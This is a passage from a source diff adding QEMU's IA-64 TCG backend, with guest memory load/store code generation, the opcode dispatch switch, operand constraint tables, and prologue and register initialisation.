OPC_EXTR_I11 : OPC_EXTR_U_I11); + fin2 = tcg_opc_i11(TCG_REG_P0, fin2, + data_reg, data_reg, shift, 63 - shift); + } + } else { + fin1 = tcg_opc_ext_i(TCG_REG_P0, opc, data_reg, TCG_REG_R8); + } + + tcg_out_bundle(s, mmI, + tcg_opc_mov_a(TCG_REG_P7, TCG_REG_R56, TCG_AREG0), + tcg_opc_a1 (TCG_REG_P6, OPC_ADD_A1, TCG_REG_R2, + TCG_REG_R2, TCG_REG_R57), + tcg_opc_movi_a(TCG_REG_P7, TCG_REG_R58, mem_index)); + label_ptr = s->code_ptr; + tcg_out_bundle(s, miB, + tcg_opc_m1 (TCG_REG_P6, opc_ld_m1[s_bits], + TCG_REG_R8, TCG_REG_R2), + INSN_NOP_I, + tcg_opc_b3 (TCG_REG_P7, OPC_BR_CALL_SPNT_FEW_B3, TCG_REG_B0, + get_reloc_pcrel21b_slot2(label_ptr))); + + add_qemu_ldst_label(s, 1, opc, label_ptr); + + /* Note that we always use LE helper functions, so the bswap insns + here for the fast path also apply to the slow path. */ + tcg_out_bundle(s, (fin2 ? mII : miI), + INSN_NOP_M, + fin1, + fin2 ? fin2 : INSN_NOP_I); +} + +static inline void tcg_out_qemu_st(TCGContext *s, const TCGArg *args) +{ + static const uint64_t opc_st_m4[4] = { + OPC_ST1_M4, OPC_ST2_M4, OPC_ST4_M4, OPC_ST8_M4 + }; + TCGReg addr_reg, data_reg; + int mem_index; + uint64_t pre1, pre2; + TCGMemOp opc, s_bits; + tcg_insn_unit *label_ptr; + + data_reg = args[0]; + addr_reg = args[1]; + opc = args[2]; + mem_index = args[3]; + s_bits = opc & MO_SIZE; + + /* Note that we always use LE helper functions, so the bswap insns + that are here for the fast path also apply to the slow path, + and move the data into the argument register. */ + pre2 = INSN_NOP_I; + if (opc & MO_BSWAP) { + pre1 = tcg_opc_bswap64_i(TCG_REG_P0, TCG_REG_R58, data_reg); + if (s_bits < MO_64) { + int shift = 64 - (8 << s_bits); + pre2 = tcg_opc_i11(TCG_REG_P0, OPC_EXTR_U_I11, + TCG_REG_R58, TCG_REG_R58, shift, 63 - shift); + } + } else { + /* Just move the data into place for the slow path. 
*/ + pre1 = tcg_opc_ext_i(TCG_REG_P0, opc, TCG_REG_R58, data_reg); + } + + tcg_out_qemu_tlb(s, addr_reg, s_bits, + offsetof(CPUArchState, tlb_table[mem_index][0].addr_write), + offsetof(CPUArchState, tlb_table[mem_index][0].addend), + pre1, pre2); + + /* P6 is the fast path, and P7 the slow path */ + tcg_out_bundle(s, mmI, + tcg_opc_mov_a(TCG_REG_P7, TCG_REG_R56, TCG_AREG0), + tcg_opc_a1 (TCG_REG_P6, OPC_ADD_A1, TCG_REG_R2, + TCG_REG_R2, TCG_REG_R57), + tcg_opc_movi_a(TCG_REG_P7, TCG_REG_R59, mem_index)); + label_ptr = s->code_ptr; + tcg_out_bundle(s, miB, + tcg_opc_m4 (TCG_REG_P6, opc_st_m4[s_bits], + TCG_REG_R58, TCG_REG_R2), + INSN_NOP_I, + tcg_opc_b3 (TCG_REG_P7, OPC_BR_CALL_SPNT_FEW_B3, TCG_REG_B0, + get_reloc_pcrel21b_slot2(label_ptr))); + + add_qemu_ldst_label(s, 0, opc, label_ptr); +} + +#else /* !CONFIG_SOFTMMU */ +# include "tcg-be-null.h" + +static inline void tcg_out_qemu_ld(TCGContext *s, const TCGArg *args) +{ + static uint64_t const opc_ld_m1[4] = { + OPC_LD1_M1, OPC_LD2_M1, OPC_LD4_M1, OPC_LD8_M1 + }; + int addr_reg, data_reg; + TCGMemOp opc, s_bits, bswap; + + data_reg = args[0]; + addr_reg = args[1]; + opc = args[2]; + s_bits = opc & MO_SIZE; + bswap = opc & MO_BSWAP; + +#if TARGET_LONG_BITS == 32 + if (GUEST_BASE != 0) { + tcg_out_bundle(s, mII, + INSN_NOP_M, + tcg_opc_i29(TCG_REG_P0, OPC_ZXT4_I29, + TCG_REG_R3, addr_reg), + tcg_opc_a1 (TCG_REG_P0, OPC_ADD_A1, TCG_REG_R2, + TCG_GUEST_BASE_REG, TCG_REG_R3)); + } else { + tcg_out_bundle(s, miI, + INSN_NOP_M, + tcg_opc_i29(TCG_REG_P0, OPC_ZXT4_I29, + TCG_REG_R2, addr_reg), + INSN_NOP_I); + } + + if (!bswap) { + if (!(opc & MO_SIGN)) { + tcg_out_bundle(s, miI, + tcg_opc_m1 (TCG_REG_P0, opc_ld_m1[s_bits], + data_reg, TCG_REG_R2), + INSN_NOP_I, + INSN_NOP_I); + } else { + tcg_out_bundle(s, mII, + tcg_opc_m1 (TCG_REG_P0, opc_ld_m1[s_bits], + data_reg, TCG_REG_R2), + INSN_NOP_I, + tcg_opc_ext_i(TCG_REG_P0, opc, data_reg, data_reg)); + } + } else if (s_bits == MO_64) { + tcg_out_bundle(s, mII, + 
tcg_opc_m1 (TCG_REG_P0, opc_ld_m1[s_bits], + data_reg, TCG_REG_R2), + INSN_NOP_I, + tcg_opc_bswap64_i(TCG_REG_P0, data_reg, data_reg)); + } else { + if (s_bits == MO_16) { + tcg_out_bundle(s, mII, + tcg_opc_m1 (TCG_REG_P0, opc_ld_m1[s_bits], + data_reg, TCG_REG_R2), + INSN_NOP_I, + tcg_opc_i12(TCG_REG_P0, OPC_DEP_Z_I12, + data_reg, data_reg, 15, 15)); + } else { + tcg_out_bundle(s, mII, + tcg_opc_m1 (TCG_REG_P0, opc_ld_m1[s_bits], + data_reg, TCG_REG_R2), + INSN_NOP_I, + tcg_opc_i12(TCG_REG_P0, OPC_DEP_Z_I12, + data_reg, data_reg, 31, 31)); + } + if (!(opc & MO_SIGN)) { + tcg_out_bundle(s, miI, + INSN_NOP_M, + INSN_NOP_I, + tcg_opc_bswap64_i(TCG_REG_P0, data_reg, data_reg)); + } else { + tcg_out_bundle(s, mII, + INSN_NOP_M, + tcg_opc_bswap64_i(TCG_REG_P0, data_reg, data_reg), + tcg_opc_ext_i(TCG_REG_P0, opc, data_reg, data_reg)); + } + } +#else + if (GUEST_BASE != 0) { + tcg_out_bundle(s, MmI, + tcg_opc_a1 (TCG_REG_P0, OPC_ADD_A1, TCG_REG_R2, + TCG_GUEST_BASE_REG, addr_reg), + tcg_opc_m1 (TCG_REG_P0, opc_ld_m1[s_bits], + data_reg, TCG_REG_R2), + INSN_NOP_I); + } else { + tcg_out_bundle(s, mmI, + INSN_NOP_M, + tcg_opc_m1 (TCG_REG_P0, opc_ld_m1[s_bits], + data_reg, addr_reg), + INSN_NOP_I); + } + + if (bswap && s_bits == MO_16) { + tcg_out_bundle(s, mII, + INSN_NOP_M, + tcg_opc_i12(TCG_REG_P0, OPC_DEP_Z_I12, + data_reg, data_reg, 15, 15), + tcg_opc_bswap64_i(TCG_REG_P0, data_reg, data_reg)); + } else if (bswap && s_bits == MO_32) { + tcg_out_bundle(s, mII, + INSN_NOP_M, + tcg_opc_i12(TCG_REG_P0, OPC_DEP_Z_I12, + data_reg, data_reg, 31, 31), + tcg_opc_bswap64_i(TCG_REG_P0, data_reg, data_reg)); + } else if (bswap && s_bits == MO_64) { + tcg_out_bundle(s, miI, + INSN_NOP_M, + INSN_NOP_I, + tcg_opc_bswap64_i(TCG_REG_P0, data_reg, data_reg)); + } + if (opc & MO_SIGN) { + tcg_out_bundle(s, miI, + INSN_NOP_M, + INSN_NOP_I, + tcg_opc_ext_i(TCG_REG_P0, opc, data_reg, data_reg)); + } +#endif +} + +static inline void tcg_out_qemu_st(TCGContext *s, const TCGArg *args) +{ + 
static uint64_t const opc_st_m4[4] = { + OPC_ST1_M4, OPC_ST2_M4, OPC_ST4_M4, OPC_ST8_M4 + }; + int addr_reg, data_reg; +#if TARGET_LONG_BITS == 64 + uint64_t add_guest_base; +#endif + TCGMemOp opc, s_bits, bswap; + + data_reg = args[0]; + addr_reg = args[1]; + opc = args[2]; + s_bits = opc & MO_SIZE; + bswap = opc & MO_BSWAP; + +#if TARGET_LONG_BITS == 32 + if (GUEST_BASE != 0) { + tcg_out_bundle(s, mII, + INSN_NOP_M, + tcg_opc_i29(TCG_REG_P0, OPC_ZXT4_I29, + TCG_REG_R3, addr_reg), + tcg_opc_a1 (TCG_REG_P0, OPC_ADD_A1, TCG_REG_R2, + TCG_GUEST_BASE_REG, TCG_REG_R3)); + } else { + tcg_out_bundle(s, miI, + INSN_NOP_M, + tcg_opc_i29(TCG_REG_P0, OPC_ZXT4_I29, + TCG_REG_R2, addr_reg), + INSN_NOP_I); + } + + if (bswap) { + if (s_bits == MO_16) { + tcg_out_bundle(s, mII, + INSN_NOP_M, + tcg_opc_i12(TCG_REG_P0, OPC_DEP_Z_I12, + TCG_REG_R3, data_reg, 15, 15), + tcg_opc_bswap64_i(TCG_REG_P0, + TCG_REG_R3, TCG_REG_R3)); + data_reg = TCG_REG_R3; + } else if (s_bits == MO_32) { + tcg_out_bundle(s, mII, + INSN_NOP_M, + tcg_opc_i12(TCG_REG_P0, OPC_DEP_Z_I12, + TCG_REG_R3, data_reg, 31, 31), + tcg_opc_bswap64_i(TCG_REG_P0, + TCG_REG_R3, TCG_REG_R3)); + data_reg = TCG_REG_R3; + } else if (s_bits == MO_64) { + tcg_out_bundle(s, miI, + INSN_NOP_M, + INSN_NOP_I, + tcg_opc_bswap64_i(TCG_REG_P0, TCG_REG_R3, data_reg)); + data_reg = TCG_REG_R3; + } + } + tcg_out_bundle(s, mmI, + tcg_opc_m4 (TCG_REG_P0, opc_st_m4[s_bits], + data_reg, TCG_REG_R2), + INSN_NOP_M, + INSN_NOP_I); +#else + if (GUEST_BASE != 0) { + add_guest_base = tcg_opc_a1 (TCG_REG_P0, OPC_ADD_A1, TCG_REG_R2, + TCG_GUEST_BASE_REG, addr_reg); + addr_reg = TCG_REG_R2; + } else { + add_guest_base = INSN_NOP_M; + } + + if (!bswap) { + tcg_out_bundle(s, (GUEST_BASE ? 
MmI : mmI), + add_guest_base, + tcg_opc_m4 (TCG_REG_P0, opc_st_m4[s_bits], + data_reg, addr_reg), + INSN_NOP_I); + } else { + if (s_bits == MO_16) { + tcg_out_bundle(s, mII, + add_guest_base, + tcg_opc_i12(TCG_REG_P0, OPC_DEP_Z_I12, + TCG_REG_R3, data_reg, 15, 15), + tcg_opc_bswap64_i(TCG_REG_P0, + TCG_REG_R3, TCG_REG_R3)); + data_reg = TCG_REG_R3; + } else if (s_bits == MO_32) { + tcg_out_bundle(s, mII, + add_guest_base, + tcg_opc_i12(TCG_REG_P0, OPC_DEP_Z_I12, + TCG_REG_R3, data_reg, 31, 31), + tcg_opc_bswap64_i(TCG_REG_P0, + TCG_REG_R3, TCG_REG_R3)); + data_reg = TCG_REG_R3; + } else if (s_bits == MO_64) { + tcg_out_bundle(s, miI, + add_guest_base, + INSN_NOP_I, + tcg_opc_bswap64_i(TCG_REG_P0, TCG_REG_R3, data_reg)); + data_reg = TCG_REG_R3; + } + tcg_out_bundle(s, miI, + tcg_opc_m4 (TCG_REG_P0, opc_st_m4[s_bits], + data_reg, addr_reg), + INSN_NOP_I, + INSN_NOP_I); + } +#endif +} + +#endif + +static inline void tcg_out_op(TCGContext *s, TCGOpcode opc, + const TCGArg *args, const int *const_args) +{ + switch(opc) { + case INDEX_op_exit_tb: + tcg_out_exit_tb(s, args[0]); + break; + case INDEX_op_br: + tcg_out_br(s, args[0]); + break; + case INDEX_op_goto_tb: + tcg_out_goto_tb(s, args[0]); + break; + + case INDEX_op_ld8u_i32: + case INDEX_op_ld8u_i64: + tcg_out_ld_rel(s, OPC_LD1_M1, args[0], args[1], args[2]); + break; + case INDEX_op_ld8s_i32: + case INDEX_op_ld8s_i64: + tcg_out_ld_rel(s, OPC_LD1_M1, args[0], args[1], args[2]); + tcg_out_ext(s, OPC_SXT1_I29, args[0], args[0]); + break; + case INDEX_op_ld16u_i32: + case INDEX_op_ld16u_i64: + tcg_out_ld_rel(s, OPC_LD2_M1, args[0], args[1], args[2]); + break; + case INDEX_op_ld16s_i32: + case INDEX_op_ld16s_i64: + tcg_out_ld_rel(s, OPC_LD2_M1, args[0], args[1], args[2]); + tcg_out_ext(s, OPC_SXT2_I29, args[0], args[0]); + break; + case INDEX_op_ld_i32: + case INDEX_op_ld32u_i64: + tcg_out_ld_rel(s, OPC_LD4_M1, args[0], args[1], args[2]); + break; + case INDEX_op_ld32s_i64: + tcg_out_ld_rel(s, OPC_LD4_M1, args[0], 
args[1], args[2]); + tcg_out_ext(s, OPC_SXT4_I29, args[0], args[0]); + break; + case INDEX_op_ld_i64: + tcg_out_ld_rel(s, OPC_LD8_M1, args[0], args[1], args[2]); + break; + case INDEX_op_st8_i32: + case INDEX_op_st8_i64: + tcg_out_st_rel(s, OPC_ST1_M4, args[0], args[1], args[2]); + break; + case INDEX_op_st16_i32: + case INDEX_op_st16_i64: + tcg_out_st_rel(s, OPC_ST2_M4, args[0], args[1], args[2]); + break; + case INDEX_op_st_i32: + case INDEX_op_st32_i64: + tcg_out_st_rel(s, OPC_ST4_M4, args[0], args[1], args[2]); + break; + case INDEX_op_st_i64: + tcg_out_st_rel(s, OPC_ST8_M4, args[0], args[1], args[2]); + break; + + case INDEX_op_add_i32: + case INDEX_op_add_i64: + tcg_out_add(s, args[0], args[1], args[2], const_args[2]); + break; + case INDEX_op_sub_i32: + case INDEX_op_sub_i64: + tcg_out_sub(s, args[0], args[1], const_args[1], args[2], const_args[2]); + break; + + case INDEX_op_and_i32: + case INDEX_op_and_i64: + /* TCG expects arg2 constant; A3 expects arg1 constant. Swap. */ + tcg_out_alu(s, OPC_AND_A1, OPC_AND_A3, args[0], + args[2], const_args[2], args[1], const_args[1]); + break; + case INDEX_op_andc_i32: + case INDEX_op_andc_i64: + tcg_out_alu(s, OPC_ANDCM_A1, OPC_ANDCM_A3, args[0], + args[1], const_args[1], args[2], const_args[2]); + break; + case INDEX_op_eqv_i32: + case INDEX_op_eqv_i64: + tcg_out_eqv(s, args[0], args[1], const_args[1], + args[2], const_args[2]); + break; + case INDEX_op_nand_i32: + case INDEX_op_nand_i64: + tcg_out_nand(s, args[0], args[1], const_args[1], + args[2], const_args[2]); + break; + case INDEX_op_nor_i32: + case INDEX_op_nor_i64: + tcg_out_nor(s, args[0], args[1], const_args[1], + args[2], const_args[2]); + break; + case INDEX_op_or_i32: + case INDEX_op_or_i64: + /* TCG expects arg2 constant; A3 expects arg1 constant. Swap. 
*/ + tcg_out_alu(s, OPC_OR_A1, OPC_OR_A3, args[0], + args[2], const_args[2], args[1], const_args[1]); + break; + case INDEX_op_orc_i32: + case INDEX_op_orc_i64: + tcg_out_orc(s, args[0], args[1], const_args[1], + args[2], const_args[2]); + break; + case INDEX_op_xor_i32: + case INDEX_op_xor_i64: + /* TCG expects arg2 constant; A3 expects arg1 constant. Swap. */ + tcg_out_alu(s, OPC_XOR_A1, OPC_XOR_A3, args[0], + args[2], const_args[2], args[1], const_args[1]); + break; + + case INDEX_op_mul_i32: + case INDEX_op_mul_i64: + tcg_out_mul(s, args[0], args[1], args[2]); + break; + + case INDEX_op_sar_i32: + tcg_out_sar_i32(s, args[0], args[1], args[2], const_args[2]); + break; + case INDEX_op_sar_i64: + tcg_out_sar_i64(s, args[0], args[1], args[2], const_args[2]); + break; + case INDEX_op_shl_i32: + tcg_out_shl_i32(s, args[0], args[1], args[2], const_args[2]); + break; + case INDEX_op_shl_i64: + tcg_out_shl_i64(s, args[0], args[1], args[2], const_args[2]); + break; + case INDEX_op_shr_i32: + tcg_out_shr_i32(s, args[0], args[1], args[2], const_args[2]); + break; + case INDEX_op_shr_i64: + tcg_out_shr_i64(s, args[0], args[1], args[2], const_args[2]); + break; + case INDEX_op_rotl_i32: + tcg_out_rotl_i32(s, args[0], args[1], args[2], const_args[2]); + break; + case INDEX_op_rotl_i64: + tcg_out_rotl_i64(s, args[0], args[1], args[2], const_args[2]); + break; + case INDEX_op_rotr_i32: + tcg_out_rotr_i32(s, args[0], args[1], args[2], const_args[2]); + break; + case INDEX_op_rotr_i64: + tcg_out_rotr_i64(s, args[0], args[1], args[2], const_args[2]); + break; + + case INDEX_op_ext8s_i32: + case INDEX_op_ext8s_i64: + tcg_out_ext(s, OPC_SXT1_I29, args[0], args[1]); + break; + case INDEX_op_ext8u_i32: + case INDEX_op_ext8u_i64: + tcg_out_ext(s, OPC_ZXT1_I29, args[0], args[1]); + break; + case INDEX_op_ext16s_i32: + case INDEX_op_ext16s_i64: + tcg_out_ext(s, OPC_SXT2_I29, args[0], args[1]); + break; + case INDEX_op_ext16u_i32: + case INDEX_op_ext16u_i64: + tcg_out_ext(s, OPC_ZXT2_I29, 
args[0], args[1]); + break; + case INDEX_op_ext32s_i64: + tcg_out_ext(s, OPC_SXT4_I29, args[0], args[1]); + break; + case INDEX_op_ext32u_i64: + tcg_out_ext(s, OPC_ZXT4_I29, args[0], args[1]); + break; + + case INDEX_op_bswap16_i32: + case INDEX_op_bswap16_i64: + tcg_out_bswap16(s, args[0], args[1]); + break; + case INDEX_op_bswap32_i32: + case INDEX_op_bswap32_i64: + tcg_out_bswap32(s, args[0], args[1]); + break; + case INDEX_op_bswap64_i64: + tcg_out_bswap64(s, args[0], args[1]); + break; + + case INDEX_op_deposit_i32: + case INDEX_op_deposit_i64: + tcg_out_deposit(s, args[0], args[1], args[2], const_args[2], + args[3], args[4]); + break; + + case INDEX_op_brcond_i32: + tcg_out_brcond(s, args[2], args[0], args[1], args[3], 1); + break; + case INDEX_op_brcond_i64: + tcg_out_brcond(s, args[2], args[0], args[1], args[3], 0); + break; + case INDEX_op_setcond_i32: + tcg_out_setcond(s, args[3], args[0], args[1], args[2], 1); + break; + case INDEX_op_setcond_i64: + tcg_out_setcond(s, args[3], args[0], args[1], args[2], 0); + break; + case INDEX_op_movcond_i32: + tcg_out_movcond(s, args[5], args[0], args[1], args[2], + args[3], const_args[3], args[4], const_args[4], 1); + break; + case INDEX_op_movcond_i64: + tcg_out_movcond(s, args[5], args[0], args[1], args[2], + args[3], const_args[3], args[4], const_args[4], 0); + break; + + case INDEX_op_qemu_ld_i32: + tcg_out_qemu_ld(s, args); + break; + case INDEX_op_qemu_ld_i64: + tcg_out_qemu_ld(s, args); + break; + case INDEX_op_qemu_st_i32: + tcg_out_qemu_st(s, args); + break; + case INDEX_op_qemu_st_i64: + tcg_out_qemu_st(s, args); + break; + + case INDEX_op_mov_i32: /* Always emitted via tcg_out_mov. */ + case INDEX_op_mov_i64: + case INDEX_op_movi_i32: /* Always emitted via tcg_out_movi. */ + case INDEX_op_movi_i64: + case INDEX_op_call: /* Always emitted via tcg_out_call. 
*/ + default: + tcg_abort(); + } +} + +static const TCGTargetOpDef ia64_op_defs[] = { + { INDEX_op_br, { } }, + { INDEX_op_exit_tb, { } }, + { INDEX_op_goto_tb, { } }, + + { INDEX_op_ld8u_i32, { "r", "r" } }, + { INDEX_op_ld8s_i32, { "r", "r" } }, + { INDEX_op_ld16u_i32, { "r", "r" } }, + { INDEX_op_ld16s_i32, { "r", "r" } }, + { INDEX_op_ld_i32, { "r", "r" } }, + { INDEX_op_st8_i32, { "rZ", "r" } }, + { INDEX_op_st16_i32, { "rZ", "r" } }, + { INDEX_op_st_i32, { "rZ", "r" } }, + + { INDEX_op_add_i32, { "r", "rZ", "rI" } }, + { INDEX_op_sub_i32, { "r", "rI", "rI" } }, + + { INDEX_op_and_i32, { "r", "rI", "rI" } }, + { INDEX_op_andc_i32, { "r", "rI", "rI" } }, + { INDEX_op_eqv_i32, { "r", "rZ", "rZ" } }, + { INDEX_op_nand_i32, { "r", "rZ", "rZ" } }, + { INDEX_op_nor_i32, { "r", "rZ", "rZ" } }, + { INDEX_op_or_i32, { "r", "rI", "rI" } }, + { INDEX_op_orc_i32, { "r", "rZ", "rZ" } }, + { INDEX_op_xor_i32, { "r", "rI", "rI" } }, + + { INDEX_op_mul_i32, { "r", "rZ", "rZ" } }, + + { INDEX_op_sar_i32, { "r", "rZ", "ri" } }, + { INDEX_op_shl_i32, { "r", "rZ", "ri" } }, + { INDEX_op_shr_i32, { "r", "rZ", "ri" } }, + { INDEX_op_rotl_i32, { "r", "rZ", "ri" } }, + { INDEX_op_rotr_i32, { "r", "rZ", "ri" } }, + + { INDEX_op_ext8s_i32, { "r", "rZ"} }, + { INDEX_op_ext8u_i32, { "r", "rZ"} }, + { INDEX_op_ext16s_i32, { "r", "rZ"} }, + { INDEX_op_ext16u_i32, { "r", "rZ"} }, + + { INDEX_op_bswap16_i32, { "r", "rZ" } }, + { INDEX_op_bswap32_i32, { "r", "rZ" } }, + + { INDEX_op_brcond_i32, { "rZ", "rZ" } }, + { INDEX_op_setcond_i32, { "r", "rZ", "rZ" } }, + { INDEX_op_movcond_i32, { "r", "rZ", "rZ", "rI", "rI" } }, + + { INDEX_op_ld8u_i64, { "r", "r" } }, + { INDEX_op_ld8s_i64, { "r", "r" } }, + { INDEX_op_ld16u_i64, { "r", "r" } }, + { INDEX_op_ld16s_i64, { "r", "r" } }, + { INDEX_op_ld32u_i64, { "r", "r" } }, + { INDEX_op_ld32s_i64, { "r", "r" } }, + { INDEX_op_ld_i64, { "r", "r" } }, + { INDEX_op_st8_i64, { "rZ", "r" } }, + { INDEX_op_st16_i64, { "rZ", "r" } }, + { INDEX_op_st32_i64, 
{ "rZ", "r" } }, + { INDEX_op_st_i64, { "rZ", "r" } }, + + { INDEX_op_add_i64, { "r", "rZ", "rI" } }, + { INDEX_op_sub_i64, { "r", "rI", "rI" } }, + + { INDEX_op_and_i64, { "r", "rI", "rI" } }, + { INDEX_op_andc_i64, { "r", "rI", "rI" } }, + { INDEX_op_eqv_i64, { "r", "rZ", "rZ" } }, + { INDEX_op_nand_i64, { "r", "rZ", "rZ" } }, + { INDEX_op_nor_i64, { "r", "rZ", "rZ" } }, + { INDEX_op_or_i64, { "r", "rI", "rI" } }, + { INDEX_op_orc_i64, { "r", "rZ", "rZ" } }, + { INDEX_op_xor_i64, { "r", "rI", "rI" } }, + + { INDEX_op_mul_i64, { "r", "rZ", "rZ" } }, + + { INDEX_op_sar_i64, { "r", "rZ", "ri" } }, + { INDEX_op_shl_i64, { "r", "rZ", "ri" } }, + { INDEX_op_shr_i64, { "r", "rZ", "ri" } }, + { INDEX_op_rotl_i64, { "r", "rZ", "ri" } }, + { INDEX_op_rotr_i64, { "r", "rZ", "ri" } }, + + { INDEX_op_ext8s_i64, { "r", "rZ"} }, + { INDEX_op_ext8u_i64, { "r", "rZ"} }, + { INDEX_op_ext16s_i64, { "r", "rZ"} }, + { INDEX_op_ext16u_i64, { "r", "rZ"} }, + { INDEX_op_ext32s_i64, { "r", "rZ"} }, + { INDEX_op_ext32u_i64, { "r", "rZ"} }, + + { INDEX_op_bswap16_i64, { "r", "rZ" } }, + { INDEX_op_bswap32_i64, { "r", "rZ" } }, + { INDEX_op_bswap64_i64, { "r", "rZ" } }, + + { INDEX_op_brcond_i64, { "rZ", "rZ" } }, + { INDEX_op_setcond_i64, { "r", "rZ", "rZ" } }, + { INDEX_op_movcond_i64, { "r", "rZ", "rZ", "rI", "rI" } }, + + { INDEX_op_deposit_i32, { "r", "rZ", "ri" } }, + { INDEX_op_deposit_i64, { "r", "rZ", "ri" } }, + + { INDEX_op_qemu_ld_i32, { "r", "r" } }, + { INDEX_op_qemu_ld_i64, { "r", "r" } }, + { INDEX_op_qemu_st_i32, { "SZ", "r" } }, + { INDEX_op_qemu_st_i64, { "SZ", "r" } }, + + { -1 }, +}; + +/* Generate global QEMU prologue and epilogue code */ +static void tcg_target_qemu_prologue(TCGContext *s) +{ + int frame_size; + + /* reserve some stack space */ + frame_size = TCG_STATIC_CALL_ARGS_SIZE + + CPU_TEMP_BUF_NLONGS * sizeof(long); + frame_size = (frame_size + TCG_TARGET_STACK_ALIGN - 1) & + ~(TCG_TARGET_STACK_ALIGN - 1); + tcg_set_frame(s, TCG_REG_CALL_STACK, 
TCG_STATIC_CALL_ARGS_SIZE, + CPU_TEMP_BUF_NLONGS * sizeof(long)); + + /* First emit adhoc function descriptor */ + *s->code_ptr = (tcg_insn_unit){ + (uint64_t)(s->code_ptr + 1), /* entry point */ + 0 /* skip gp */ + }; + s->code_ptr++; + + /* prologue */ + tcg_out_bundle(s, miI, + tcg_opc_m34(TCG_REG_P0, OPC_ALLOC_M34, + TCG_REG_R34, 32, 24, 0), + INSN_NOP_I, + tcg_opc_i21(TCG_REG_P0, OPC_MOV_I21, + TCG_REG_B6, TCG_REG_R33, 0)); + + /* ??? If GUEST_BASE < 0x200000, we could load the register via + an ADDL in the M slot of the next bundle. */ + if (GUEST_BASE != 0) { + tcg_out_bundle(s, mlx, + INSN_NOP_M, + tcg_opc_l2 (GUEST_BASE), + tcg_opc_x2 (TCG_REG_P0, OPC_MOVL_X2, + TCG_GUEST_BASE_REG, GUEST_BASE)); + tcg_regset_set_reg(s->reserved_regs, TCG_GUEST_BASE_REG); + } + + tcg_out_bundle(s, miB, + tcg_opc_a4 (TCG_REG_P0, OPC_ADDS_A4, + TCG_REG_R12, -frame_size, TCG_REG_R12), + tcg_opc_i22(TCG_REG_P0, OPC_MOV_I22, + TCG_REG_R33, TCG_REG_B0), + tcg_opc_b4 (TCG_REG_P0, OPC_BR_SPTK_MANY_B4, TCG_REG_B6)); + + /* epilogue */ + tb_ret_addr = s->code_ptr; + tcg_out_bundle(s, miI, + INSN_NOP_M, + tcg_opc_i21(TCG_REG_P0, OPC_MOV_I21, + TCG_REG_B0, TCG_REG_R33, 0), + tcg_opc_a4 (TCG_REG_P0, OPC_ADDS_A4, + TCG_REG_R12, frame_size, TCG_REG_R12)); + tcg_out_bundle(s, miB, + INSN_NOP_M, + tcg_opc_i26(TCG_REG_P0, OPC_MOV_I_I26, + TCG_REG_PFS, TCG_REG_R34), + tcg_opc_b4 (TCG_REG_P0, OPC_BR_RET_SPTK_MANY_B4, + TCG_REG_B0)); +} + +static void tcg_target_init(TCGContext *s) +{ + tcg_regset_set(s->tcg_target_available_regs[TCG_TYPE_I32], + 0xffffffffffffffffull); + tcg_regset_set(s->tcg_target_available_regs[TCG_TYPE_I64], + 0xffffffffffffffffull); + + tcg_regset_clear(s->tcg_target_call_clobber_regs); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R8); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R9); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R10); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R11); + 
tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R14); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R15); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R16); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R17); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R18); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R19); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R20); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R21); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R22); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R23); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R24); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R25); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R26); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R27); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R28); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R29); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R30); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R31); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R56); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R57); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R58); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R59); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R60); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R61); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R62); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R63); + + tcg_regset_clear(s->reserved_regs); + tcg_regset_set_reg(s->reserved_regs, TCG_REG_R0); /* zero register */ + tcg_regset_set_reg(s->reserved_regs, TCG_REG_R1); /* global pointer */ + tcg_regset_set_reg(s->reserved_regs, 
TCG_REG_R2); /* internal use */ + tcg_regset_set_reg(s->reserved_regs, TCG_REG_R3); /* internal use */ + tcg_regset_set_reg(s->reserved_regs, TCG_REG_R12); /* stack pointer */ + tcg_regset_set_reg(s->reserved_regs, TCG_REG_R13); /* thread pointer */ + tcg_regset_set_reg(s->reserved_regs, TCG_REG_R33); /* return address */ + tcg_regset_set_reg(s->reserved_regs, TCG_REG_R34); /* PFS */ + + /* The following 4 are not in use, are call-saved, but *not* saved + by the prologue. Therefore we cannot use them without modifying + the prologue. There doesn't seem to be any good reason to use + these as opposed to the windowed registers. */ + tcg_regset_set_reg(s->reserved_regs, TCG_REG_R4); + tcg_regset_set_reg(s->reserved_regs, TCG_REG_R5); + tcg_regset_set_reg(s->reserved_regs, TCG_REG_R6); + tcg_regset_set_reg(s->reserved_regs, TCG_REG_R7); + + tcg_add_target_add_op_defs(s, ia64_op_defs); +} diff --git 